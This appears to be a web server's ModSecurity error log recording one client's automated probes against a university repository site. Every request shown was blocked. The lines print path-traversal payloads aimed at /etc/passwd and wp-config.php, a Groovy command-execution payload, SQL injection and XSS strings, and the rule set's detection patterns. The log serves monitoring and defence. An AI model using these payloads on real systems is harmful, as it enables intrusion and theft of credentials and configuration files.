[Tue Aug 29 11:47:50.437561 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjrbKgAAAAP"]
[Tue Aug 29 11:47:51.400493 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14d8Co-f0AAAj11@MAAAAa"]
[Tue Aug 29 11:47:51.479487 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjbw3UAAAAW"]
[Tue Aug 29 11:47:52.428007 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "repositoryfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO14eMCo-f0AAAkNPpAAAAAI"]
[Tue Aug 29 11:47:52.474963 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjqDFkAAAAH"]
[Tue Aug 29 11:47:53.364908 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkAL9kAAAAU"]
[Tue Aug 29 11:47:54.433684 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAkGCUkAAAAE"]
[Tue Aug 29 11:47:56.487467 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqMAAAAI"]
[Tue Aug 29 11:47:57.391491 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhui-QAAAAr"]
[Tue Aug 29 11:47:58.432871 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAi2yMMAAAAN"]
[Tue Aug 29 11:47:58.436793 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkaDAEAAAAJ"]
[Tue Aug 29 11:48:00.691705 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjy53UAAAAG"]
[Tue Aug 29 11:48:03.360484 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAjy54sAAAAG"]
[Tue Aug 29 11:48:03.480724 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAjbw6QAAAAW"]
[Tue Aug 29 11:48:04.430737 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkaDBAAAAAJ"]
[Tue Aug 29 11:48:05.381734 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkdu78AAAAO"]
[Tue Aug 29 11:48:05.400825 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjy55UAAAAG"]
[Tue Aug 29 11:48:06.391016 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkksHIAAAAA"]
[Tue Aug 29 11:48:06.443871 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12CAAAAAa"]
[Tue Aug 29 11:48:07.463279 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjy554AAAAG"]
[Tue Aug 29 11:48:08.395651 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjtc7IAAAAX"]
[Tue Aug 29 11:48:09.399837 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAj12CkAAAAa"]
[Tue Aug 29 11:48:09.456530 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkGCXMAAAAE"]
[Tue Aug 29 11:48:11.370989 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkAMAsAAAAU"]
[Tue Aug 29 11:48:12.397681 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAfWN4AAAAAL"]
[Tue Aug 29 11:48:12.808686 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN5MAAAAL"]
[Tue Aug 29 11:48:13.463678 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfeb.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMCAAAAAU"]
[Tue Aug 29 11:48:13.463719 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMCAAAAAU"]
[Tue Aug 29 11:48:18.350570 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAfWN7gAAAAL"]
[Tue Aug 29 11:48:19.408576 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14k8Co-f0AAAkAMFQAAAAU"]
[Tue Aug 29 11:48:21.519084 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrEMAAAAK"]
[Tue Aug 29 11:48:21.581367 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6wAAAAC"]
[Tue Aug 29 11:48:21.621565 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEgAAAAK"]
[Tue Aug 29 11:48:22.408185 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkqHpUAAAAM"]
[Tue Aug 29 11:48:23.971321 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12FcAAAAa"]
